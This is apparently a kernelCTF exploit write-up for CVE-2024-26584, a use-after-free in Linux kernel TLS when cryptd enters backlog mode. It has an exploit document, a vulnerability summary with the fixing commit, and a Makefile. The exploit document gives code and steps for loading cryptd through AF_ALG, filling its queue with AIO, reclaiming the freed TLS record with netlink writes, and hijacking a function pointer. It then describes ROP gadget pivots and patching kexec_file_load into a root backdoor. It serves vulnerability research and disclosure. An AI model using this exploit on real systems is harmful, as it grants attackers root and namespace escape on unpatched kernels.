pocs/linux/kernelctf/CVE-2024-26584_lts_cos/docs/exploit.md
## Setup

### TLS setup
To trigger kernel TLS encryption we must first configure the socket.
This is done using setsockopt() at the SOL_TLS level, after the "tls" ULP has been attached to the connected TCP socket:

```
static struct tls12_crypto_info_aes_ccm_128 crypto_info;
crypto_info.info.version = TLS_1_2_VERSION;
crypto_info.info.cipher_type = TLS_CIPHER_AES_CCM_128;

if (setsockopt(sock, SOL_TLS, TLS_TX, &crypto_info, sizeof(crypto_info)) < 0)
    err(1, "TLS_TX");
```

This syscall triggers allocation of TLS context objects which will be important later on during the exploitation phase.
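
For context, here is a fuller sketch of the TX setup (a minimal sketch only: the helper name, the all-zero key/IV material, and the assumption of an already connected TCP socket are illustrative, not taken from the actual exploit):

```
#include <err.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <linux/tls.h>

/* Illustrative: configure TLS 1.2 AES-CCM-128 TX on an already connected TCP socket. */
static void setup_tls_tx(int sock)
{
    struct tls12_crypto_info_aes_ccm_128 crypto_info = {0};

    /* The "tls" ULP must be attached before SOL_TLS options are accepted. */
    if (setsockopt(sock, SOL_TCP, TCP_ULP, "tls", sizeof("tls")) < 0)
        err(1, "TCP_ULP");

    crypto_info.info.version = TLS_1_2_VERSION;
    crypto_info.info.cipher_type = TLS_CIPHER_AES_CCM_128;
    /* key/iv/salt/rec_seq are left zeroed; their actual values don't matter here. */

    if (setsockopt(sock, SOL_TLS, TLS_TX, &crypto_info, sizeof(crypto_info)) < 0)
        err(1, "TLS_TX");
}
```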

In the kernelCTF config, PCRYPT (the parallel crypto engine) is disabled, so our only option for triggering async crypto is CRYPTD (the software async crypto daemon).

Each crypto operation needed for TLS is usually implemented by multiple drivers.
For example, AES encryption in CBC mode is available through aesni_intel, aes_generic or cryptd (a daemon that runs the basic synchronous implementations asynchronously through an internal per-CPU queue).

Available drivers can be examined by looking at /proc/crypto; however, it only lists drivers from currently loaded modules, and the Crypto API can load additional modules on demand.

As seen in the code snippet above, we don't have direct control over which crypto drivers are used for our TLS encryption.
Drivers are selected automatically by the Crypto API based on a priority field, which is calculated internally to try to choose the "best" driver.

By default, cryptd is not selected and is not even loaded, which gives us no chance to exploit vulnerabilities in async operations.

However, we can cause cryptd to be loaded and influence the selection of drivers for TLS operations by using the Crypto User API. This API is used to perform low-level cryptographic operations and allows the user to select an arbitrary driver.

The interesting thing is that requesting a given driver permanently changes the system-wide list of available drivers and their priorities, affecting future TLS operations.

The following code causes the AES CCM encryption selected for TLS to be handled by cryptd:

```
struct sockaddr_alg sa = {
    .salg_family = AF_ALG,
    .salg_type = "skcipher",
    .salg_name = "cryptd(ctr(aes-generic))"
};
int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0);

/* Requesting the cryptd-wrapped cipher loads cryptd and registers its driver. */
if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0)
    err(1, "af_alg bind");

struct sockaddr_alg sa2 = {
    .salg_family = AF_ALG,
    .salg_type = "aead",
    .salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))"
};

/* Registers an AEAD instance backed by cryptd that the TLS code will later pick. */
if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa2)) < 0)
    err(1, "af_alg bind");
```

### User API crypto setup

We'll also use the crypto user API to execute symmetric key cipher operations handled by cryptd.
The user API has a more complex setup sequence than TLS.

We need to:
1. Create an AF_ALG socket.
2. Bind a sockaddr_alg structure to select the crypto type (skcipher, aead, hash, etc.) and the algorithm.
3. Call setsockopt() with ALG_SET_KEY to set the key.
4. Call accept() on the socket to obtain a second socket that will be used for the actual crypto operations.
5. Call sendmsg() with a prepared message containing the data to be encrypted/decrypted, plus a control message selecting the mode (encryption/decryption) and the IV for the operation.
6. Finally, call recvmsg() to trigger the actual crypto operation and get the results.
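
A minimal sketch of this sequence, reusing the skcipher registered above (hedged: the helper name, key/IV values and buffer sizes are illustrative, not the exploit's actual code):

```
#include <err.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_alg.h>

/* Illustrative: queue one AES-CTR encryption request through the user API. */
static int alg_encrypt_request(void)
{
    struct sockaddr_alg sa = {
        .salg_family = AF_ALG,
        .salg_type = "skcipher",
        .salg_name = "cryptd(ctr(aes-generic))"
    };
    char key[16] = {0}, iv[16] = {0}, buf[16] = {0};
    char cbuf[CMSG_SPACE(4) + CMSG_SPACE(sizeof(struct af_alg_iv) + sizeof(iv))] = {0};

    int tfm = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (tfm < 0 || bind(tfm, (struct sockaddr *)&sa, sizeof(sa)) < 0)
        err(1, "af_alg socket/bind");
    if (setsockopt(tfm, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) < 0)
        err(1, "ALG_SET_KEY");

    int op = accept(tfm, NULL, NULL);               /* socket for the actual ops */

    struct iovec iov = { .iov_base = buf, .iov_len = sizeof(buf) };
    struct msghdr msg = {
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = cbuf, .msg_controllen = sizeof(cbuf),
    };

    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);     /* select encryption */
    cmsg->cmsg_level = SOL_ALG;
    cmsg->cmsg_type = ALG_SET_OP;
    cmsg->cmsg_len = CMSG_LEN(4);
    *(unsigned int *)CMSG_DATA(cmsg) = ALG_OP_ENCRYPT;

    cmsg = CMSG_NXTHDR(&msg, cmsg);                 /* set the IV */
    cmsg->cmsg_level = SOL_ALG;
    cmsg->cmsg_type = ALG_SET_IV;
    cmsg->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + sizeof(iv));
    struct af_alg_iv *alg_iv = (struct af_alg_iv *)CMSG_DATA(cmsg);
    alg_iv->ivlen = sizeof(iv);
    memcpy(alg_iv->iv, iv, sizeof(iv));

    if (sendmsg(op, &msg, 0) < 0)
        err(1, "sendmsg");

    /* recvmsg()/read() on 'op' triggers the operation; in the exploit that read
       is queued via AIO instead (see the next section). */
    return op;
}
```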

## Reaching the queue limit of cryptd

The default queue limit (cryptd.cryptd_max_cpu_qlen) is 1000.
The naive way to reach it would be to just make a lot of TLS or crypto API requests with sendmsg()/recvmsg(), but we would quickly learn that this approach is useless: on each return from the kernel the cryptd worker gets scheduled and processes one of our requests, so the queue size stays basically constant.

We need a way to submit crypto requests without leaving the kernel. This could be done using io_uring, but it is disabled on kernelCTF LTS instances.
Instead we'll use a lesser-known async subsystem of the kernel called AIO.
It's much simpler than io_uring and only supports read/write/poll/fsync operations, but that is enough for our purposes.

Using AIO is very simple: we just describe the operations to be performed in an array of iocb structures and pass it to io_submit().

To reach the queue limit, we simply prepare over 1000 user crypto API encryption requests.
User API requests do not set the CRYPTO_TFM_REQ_MAY_BACKLOG flag, so requests over the limit will just be rejected instead of going into backlog mode.
This way we don't have to worry about triggering the vulnerability prematurely.
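
A hedged sketch of the queue-filling step with libaio (the exploit links against -laio; the request count, fd array and helper name here are illustrative):

```
#include <err.h>
#include <libaio.h>

#define NR_REQS 1024   /* comfortably above cryptd_max_cpu_qlen (1000) */

/*
 * Illustrative: submit >1000 reads on AF_ALG op sockets (each read triggers one
 * queued cryptd encryption) in a single io_submit(), so we never return to
 * userspace and cryptd never gets a chance to drain the queue in between.
 * 'ctx' is assumed to have been set up earlier with io_setup(NR_REQS, &ctx).
 */
static void fill_cryptd_queue(io_context_t ctx, int op_fds[NR_REQS])
{
    static struct iocb iocbs[NR_REQS];
    static struct iocb *iocbps[NR_REQS];
    static char results[NR_REQS][16];

    for (int i = 0; i < NR_REQS; i++) {
        io_prep_pread(&iocbs[i], op_fds[i], results[i], sizeof(results[i]), 0);
        iocbps[i] = &iocbs[i];
    }

    if (io_submit(ctx, NR_REQS, iocbps) < 0)
        errx(1, "io_submit failed");
}
```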

## Triggering the use-after-free

When the cryptd queue is at max capacity, we just have to call sendmsg() on our TLS socket; this will put our request on cryptd's backlog.
crypto_aead_encrypt() will return -EBUSY, which leads to the current open TLS record being freed in tls_free_open_rec()/tls_free_rec() before we return from sendmsg().

The TLS record contains the AEAD request:

```
struct tls_rec {
...
struct aead_request aead_req __attribute__((__aligned__(8))); /* 0x678 0x50 */
/* --- cacheline 27 boundary (1728 bytes) was 8 bytes ago --- */
u8 aead_req_ctx[]; /* 0x6c8 0 */
/* size: 1736, cachelines: 28, members: 14 */
};

struct aead_request {
struct crypto_async_request base; /* 0 0x30 */
unsigned int assoclen; /* 0x30 0x4 */
unsigned int cryptlen; /* 0x34 0x4 */
u8 * iv; /* 0x38 0x8 */
struct scatterlist * src; /* 0x40 0x8 */
struct scatterlist * dst; /* 0x48 0x8 */
void * __ctx[] __attribute__((__aligned__(8))); /* 0x50 0 */
/* size: 80, cachelines: 2, members: 7 */
};


```

and this AEAD request is passed to the crypto API in tls_do_encryption() to be queued in cryptd and set as the current backlog request.

When the process returns from sendmsg(), the cryptd worker will be scheduled to run on our CPU.
The first thing the worker does in cryptd_queue_worker() is check whether there is a backlog request and, if so, call its complete() function with an -EINPROGRESS argument:

```
static void cryptd_queue_worker(struct work_struct *work)
{
	struct cryptd_cpu_queue *cpu_queue;
	struct crypto_async_request *req, *backlog;

	...
	backlog = crypto_get_backlog(&cpu_queue->queue);
	req = crypto_dequeue_request(&cpu_queue->queue);
	local_bh_enable();

	if (!req)
		return;

	if (backlog)
		backlog->complete(backlog, -EINPROGRESS);
```

'backlog' is a pointer to the crypto_async_request part of the aead_request (which is itself part of the tls_rec) that was recently freed by the TLS subsystem. So all we have to do to get RCE is allocate our payload in place of the freed tls_rec object in the window between the return from the TLS sendmsg() and the execution of cryptd_queue_worker().

## Allocating our payload in place of the tls_rec

struct tls_rec has a variable size depending on the crypto algorithms used, but in our case it is allocated from kmalloc-4096.
We can't use traditional allocation primitives such as xattrs or user keys, because AIO only allows reads and writes. However, write() called on a connected socket will allocate space for the skbuff data using kmalloc() if the write length is below 0x1000. We used a netlink socket, but any socket would do in this case.
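
A hedged sketch of this spray primitive (the self-connected netlink socket is one common way to keep the sprayed skb queued; the original exploit's exact socket setup and payload size may differ):

```
#include <err.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>

/* Illustrative: a netlink socket connected to itself, so sprayed skbs stay
   queued in its own receive buffer instead of being freed. */
static int make_spray_socket(void)
{
    struct sockaddr_nl self = { .nl_family = AF_NETLINK };
    socklen_t len = sizeof(self);
    int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_USERSOCK);

    if (nl < 0 || bind(nl, (struct sockaddr *)&self, sizeof(self)) < 0)
        err(1, "netlink socket/bind");          /* autobind picks a port id */
    if (getsockname(nl, (struct sockaddr *)&self, &len) < 0 ||
        connect(nl, (struct sockaddr *)&self, sizeof(self)) < 0)
        err(1, "netlink connect");
    return nl;
}

/* A write below 0x1000 bytes makes the skb data come from kmalloc-4096,
   reclaiming the freed tls_rec. In the exploit this write is queued via AIO. */
static void spray_payload(int nl, const void *payload, size_t len)
{
    if (write(nl, payload, len) < 0)
        err(1, "spray write");
}
```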

## Getting RIP control

Here's what our sequence of AIO operations looks like:

- skcipher socket read 1 (triggering a user API encryption request)
- skcipher socket read 2
- skcipher socket read ...
- skcipher socket read 1000
- TLS socket write triggering a TLS encryption request
- netlink socket write which will put our payload in the recently freed kmalloc-4096 object.

Calling io_submit() executes these operations in the given order, and before we return to userspace, cryptd will call a function pointer under our control (the complete field at offset 0x10 of the crypto_async_request).

```
struct crypto_async_request {
struct list_head list; /* 0 0x10 */
crypto_completion_t complete; /* 0x10 0x8 */
void * data; /* 0x18 0x8 */
struct crypto_tfm * tfm; /* 0x20 0x8 */
u32 flags; /* 0x28 0x4 */

/* size: 48, cachelines: 1, members: 5 */
};

```

## Pivot to ROP

The complete() function is called with the pointer to the crypto_async_request in RDI.

Three gadgets are needed to pivot to the ROP chain:

```
mov r8, qword ptr [rdi + 0xc8]
mov eax, 1
test r8, r8
je 0xffffffff81ed2b71
mov rsi, rdi
mov rcx, r14
mov rdi, rbp
mov rdx, r15
call __x86_indirect_thunk_r8
```

which loads a controlled pointer from [rdi + 0xc8] into R8, copies RDI to RSI, and calls it,

```
push rsi
jmp qword ptr [rsi + 0x66]
```

and
```
pop rsp
```
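
Chaining these together: the first gadget fetches its call target from [rdi + 0xc8] and copies RDI (the address of our fake crypto_async_request) into RSI; the second gadget pushes RSI and jumps through [rsi + 0x66]; the third gadget pops that pushed pointer into RSP, so execution continues as a ROP chain starting at offset 0 of our sprayed object. A sketch of the resulting fake-object layout (the gadget addresses and the handling of the overlapping slots are assumptions, resolved in the real exploit from the KASLR leak):

```
#include <stdint.h>
#include <string.h>

/*
 * Illustrative layout of the sprayed object. 'obj' points at the bytes that
 * overlay the freed tls_rec's aead_req.base (the pointer cryptd passes in RDI).
 * GADGET1/2/3 and the chain entries are placeholders.
 */
static void build_fake_object(uint8_t *obj, uint64_t GADGET1, uint64_t GADGET2,
                              uint64_t GADGET3, const uint64_t *rop, size_t rop_words)
{
    /* The ROP chain starts at offset 0; its early entries must step over the
       slots reused below at 0x10, 0x66 and 0xc8 (assumption). */
    memcpy(obj, rop, rop_words * sizeof(uint64_t));

    memcpy(obj + 0x10, &GADGET1, 8);   /* ->complete: mov r8,[rdi+0xc8] ; mov rsi,rdi ; call r8 */
    memcpy(obj + 0x66, &GADGET3, 8);   /* [rsi+0x66] target: pop rsp */
    memcpy(obj + 0xc8, &GADGET2, 8);   /* [rdi+0xc8] target: push rsi ; jmp [rsi+0x66] */
}
```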

## Second pivot

At this point we have full ROP, but our space is limited.
To have enough space to execute all privilege escalation code we have to pivot again.
This is quite simple: we choose an unused read/write area in the kernel and use copy_user_generic_string() to copy the second-stage ROP chain from userspace into that area.
Then we use a `pop rsp ; ret` gadget to pivot there.
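
Conceptually, the first-stage chain does something like the following (a sketch under assumptions: all gadget/symbol addresses are placeholders that the real exploit resolves from its KASLR leak, and the scratch-area choice is illustrative):

```
#include <stdint.h>

/* Placeholder addresses (assumptions), resolved at runtime in the real exploit. */
extern uint64_t POP_RDI_RET, POP_RSI_RET, POP_RDX_RET, POP_RSP_RET;
extern uint64_t COPY_USER_GENERIC_STRING;   /* copy_user_generic_string() */
extern uint64_t KERNEL_SCRATCH_RW;          /* unused read/write kernel area */

/* Stage 1: copy the second-stage chain from userspace into the scratch area,
   then pivot RSP there. Returns the number of chain entries written. */
static int build_stage1(uint64_t *rop, uint64_t stage2_user_buf, uint64_t stage2_len)
{
    int i = 0;
    rop[i++] = POP_RDI_RET; rop[i++] = KERNEL_SCRATCH_RW;   /* dst */
    rop[i++] = POP_RSI_RET; rop[i++] = stage2_user_buf;     /* src (userspace) */
    rop[i++] = POP_RDX_RET; rop[i++] = stage2_len;          /* len */
    rop[i++] = COPY_USER_GENERIC_STRING;
    rop[i++] = POP_RSP_RET; rop[i++] = KERNEL_SCRATCH_RW;   /* pivot to stage 2 */
    return i;
}
```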

## Privilege escalation

Our ROP is executed from the cryptd kernel thread context, so we can't do a traditional commit_creds() to modify the current process's privileges.

We could try locating our exploit process and changing its privileges, but we decided to go with a different approach: we patch the kernel, creating a backdoor that grants root privileges to any process that executes a given syscall.

We chose the rarely used kexec_file_load() syscall and overwrote its code with our get_root function, which does all the traditional privilege escalation/namespace escape steps: commit_creds(init_cred), switch_task_namespaces(pid, init_nsproxy), etc.

This function also returns a special value (0x777) that our user space code can use to detect if the system was already compromised.

Patching the kernel code is done by rop_patch_kernel_code(): it calls set_memory_rw() on the destination memory and uses copy_user_generic() to write the new code there.
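
For illustration, the userspace side of the backdoor can be as simple as the following (a sketch; the argument values are irrelevant once the syscall body has been patched, and 0x777 is the marker value mentioned above):

```
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>

/* Call the patched syscall; the backdoored body grants root to the caller
   and returns 0x777 so userspace can detect that the patch is in place. */
static int trigger_backdoor(void)
{
    long ret = syscall(SYS_kexec_file_load, -1, -1, 0UL, NULL, 0UL);

    if (ret == 0x777) {
        printf("backdoor active, uid=%d\n", (int)getuid());
        return 0;
    }
    return -1;
}
```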
pocs/linux/kernelctf/CVE-2024-26584_lts_cos/docs/vulnerability.md
## Requirements to trigger the vulnerability

- Kernel configuration: CONFIG_TLS and CONFIG_CRYPTO_CRYPTD
- User namespaces required: no

## Commit which introduced the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=94524d8fc965a7a0facdef6d1b01d5ef6d71a802

## Commit which fixed the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8590541473188741055d27b955db0777569438e3

## Affected kernel versions

Introduced in 4.2. Fixed in 6.1.78, 5.15.159 and other stable trees.

## Affected component, subsystem

net/tls

## Description

When TLS submits a request to the crypto API in async mode, the request is handled by cryptd; if the number of queued requests then exceeds the maximum queue size (cryptd.cryptd_max_cpu_qlen), the API enters "backlog mode", which has several consequences:

- crypto_aead_decrypt()/crypto_aead_encrypt() returns -EBUSY, which the TLS subsystem treats as a fatal error, causing kfree() to be called on the whole TLS context, including the AEAD request object that is still referenced from the cryptd queue (use-after-free).
- cryptd calls the async callback (tls_encrypt_done()/tls_decrypt_done()) twice: first with err == -EINPROGRESS and later with the actual error status of the finished request. The TLS callbacks are not prepared for this extra call, which leads to a double free: tls_decrypt_done() releases the pages used to store the cleartext and frees the AEAD request context object a second time.
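
For reference, the core idea of the fix in the completion callbacks can be sketched roughly as follows (paraphrased, not the verbatim upstream code; see the fix commit above, which also makes the TLS code request and wait for backlogged requests explicitly):

```
/* Paraphrased sketch of the fix's idea in tls_encrypt_done()/tls_decrypt_done(). */
static void tls_encrypt_done(struct crypto_async_request *req, int err)
{
	if (err == -EINPROGRESS)   /* backlog notification, not the real completion */
		return;

	/* ... the original completion handling then runs only once ... */
}
```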
Makefile
INCLUDES =
LIBS = -pthread -ldl -laio
CFLAGS = -fomit-frame-pointer -static -fcf-protection=none

exploit: exploit.c kernelver_17412.294.10.h kaslr.c
	gcc -o $@ exploit.c kaslr.c $(INCLUDES) $(CFLAGS) $(LIBS)

prerequisites:
	sudo apt-get install libkeyutils-dev libaio-dev